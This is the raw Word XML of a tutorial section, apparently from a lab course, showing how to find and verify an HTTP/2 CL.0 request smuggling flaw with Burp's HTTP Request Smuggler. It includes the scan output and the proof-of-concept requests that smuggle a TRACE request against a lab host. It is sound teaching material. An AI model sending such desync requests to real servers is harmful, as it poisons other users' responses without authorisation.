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45C5" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="00B57EE0">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57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Tools of the Trade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF859C"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We can again use the Burp Extension </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B57EE0">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>HTTP Request Smuggler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make our lives significantly easier when hunting for HTTP/2-related request smuggling vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E59302"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To start, we can send any HTTP/2 request to Burp Repeater. As an example, consider the following request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F456555" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="00B57EE0">
      <w:pPr>
        <w:spacing w:after="0"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Code: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D2ACC"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GET /index.php?param1=HelloWorld HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FA16F"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Host: http2.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28910A8C"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F4E7400"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FC5075A"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We can then right-click the request and go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Extensions &gt; HTTP Request Smuggler &gt; CL.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8025B" w14:textId="77706D54"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33DF90FA" wp14:editId="37DB403E">
            <wp:extent cx="5731510" cy="2064385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="674241807"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64385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F1DCC"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This will open a new window that is most likely too large for your screen. Just leave everything in the default settings and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start the scan. Burp will then run a scan for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CL.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in the background. This is the same as the type of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>H2.CL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability discussed in the previous section. It is also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CL.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability since the CL header is set to 0 and the request body contains only the smuggled request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66F28E"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We can see the result of the scan in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Extensions &gt; Installed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. When selecting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HTTP Request Smuggler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension from the list, select the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tab at the bottom of the window. The result is printed to the UI and looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73E417"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Queueing reuest scan: CL.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B020A2B"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Found issue: CL.0 desync: h2CL|TRACE /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584CD5DB"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Target: https://172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B52248"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HTTP Request Smuggler repeatedly issued the attached request. After 1 attempts, it got a response that appears to have been poisoned by the body of the previous request. For further details and information on remediation, please refer to https://portswigger.net/research/browser-powered-desync-attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF0D0F7"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 xml:space="preserve">Evidence: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D5F08"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83A4CC"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GET /index.php HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61561FB7"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Host: 172.17.0.2:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400BA831"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Origin: https://wguglsurkz2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A402B2E"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AC55336"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F160DBD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A04AB"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POST /index.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31FB72"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Host: 172.17.0.2:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118830C3"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Origin: https://wguglsurkz2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C37558"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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557975E7"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Content-Length: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FACFCF4"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A70F4E9"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TRACE / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A704111"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 xml:space="preserve">X-YzBqv: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D32BF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41108FBF"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POST /index.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33675B5E"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Host: 172.17.0.2:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28FBD8"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Origin: https://wguglsurkz2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02524705"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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B2B1D"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Content-Length: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531B606"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F2107C2"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TRACE / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01334F75"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 xml:space="preserve">X-YzBqv: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BF4E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366EFAA4"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Burp tells us that the web application is vulnerable to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CL.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. It gives us a proof-of-concept request to verify the finding from the automated scan. Let's verify the result. To do so, we are going to use the following requests from the above output. Request 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9237D0" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="00B57EE0">
      <w:pPr>
        <w:spacing w:after="0"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Code: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673FAA2"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POST /index.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62EB0D"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Host: 172.17.0.2:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE00F2A"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Origin: https://wguglsurkz2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B29600"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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B314C60"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Content-Length: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BD891"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1BFF66A"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TRACE / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5CFBC7"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 xml:space="preserve">X-YzBqv: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633CEC5"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Request 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C90455E" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="00B57EE0">
      <w:pPr>
        <w:spacing w:after="0"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Code: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1ECE8"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GET /index.php HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA5E3D"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Host: 172.17.0.2:8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE41D2"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57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Origin: https://wguglsurkz2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FF234"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7DB715C" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="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898A04E"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Create a tab group in Burp Repeater and ensure that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Update Content-Length</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> option is unchecked for the first request. To verify that other users can be affected, we will send the two requests subsequently via separate TCP connections, giving us the following two responses. The first response is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code and contains the index we requested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A8790" w14:textId="611C16DD"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C98889" wp14:editId="568B44CD">
            <wp:extent cx="5731510" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="45112156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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F4DC6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">However, the second response is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>405</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179749BA" w14:textId="7633DC46"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2887AEB6" wp14:editId="2F1F1592">
            <wp:extent cx="5731510" cy="873760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="106193133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73760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F40FCD" w14:textId="77777777" w:rsidR="00B57EE0" w:rsidRPr="00B57EE0" w:rsidRDefault="00B57EE0" w:rsidP="00B57EE0">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57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This indicates that we successfully smuggled the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>TRACE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> request past the reverse proxy and influenced the second request, proving a request smuggling vulnerability with the help of the burp extension </w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HTTP Request Smuggler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AA8B9"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8A"/>
    <w:rsid w:val="0007288A"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00B57EE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B905"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D9DA2EF0-D8FA-4E59-99B2-4CE15219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EE0"/>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EE0"/>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B57EE0"/>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B57EE0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B57EE0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B5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B57EE0"/>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B57EE0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B5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78953">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1364214395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="428307379">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="11617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007">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1758093671">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1322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338">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1040132521">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="4074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ortSwigger/http-request-smuggl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2024-01-09T12:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-09T12:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>